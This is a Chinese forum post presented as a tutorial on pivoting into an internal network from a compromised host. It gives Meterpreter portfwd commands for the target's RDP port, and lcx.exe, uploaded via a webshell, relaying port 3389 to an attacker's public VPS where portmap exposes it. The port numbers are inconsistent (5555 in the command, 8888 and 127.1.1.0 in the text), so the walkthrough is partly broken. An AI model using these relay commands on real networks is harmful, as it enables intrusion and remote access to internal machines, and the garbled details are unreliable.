本帖最后由 新手275718 于 2020-9-14 20:43 编辑
当拿下内网一台主机的控制权后,需要通过代理转发的方式进入内网,整理几种常见的内网代理转发方法。 本次以远程桌面连接来进行说明,介绍几种常用的连接方式。 本次目标主机ip为:172.16.86.153 msf反弹木马使用条件:服务器通外网,拥有自己的公网ip msf是我进行内网渗透中用的最多的工具,它内置了很多强大的功能,用起来相当方便。 msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。
portfwd add -l 5555 -p 3389 -r 172.16.86.153
转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口。 rdesktop 127.1.1.0:8888
msf内置了socks模块,在session但基础上配置路由,调用即可使用,但是速度和稳定性都很差,不做详细介绍。 lcx.exe使用条件:服务器通外网,拥有自己的公网ip lcx是一个经典的端口转发工具,直接把3389转发到公网的vps上。 通过大马上传lcx.exe,执行系统命令,其中1.1.1.1是vps的公网ip。
lcx.exe -slave 1.1.1.1 9999 127.0.0.1 3389
因为我公网vps使用的是linux的系统,lcx对应linux的工具为portmap 。 p1为监听的端口,p2为转发到的端口。
./portmap -m 2 -p1 9999 -p2 33889
直接使用远程桌面服务连接1.1.1.1:33889 |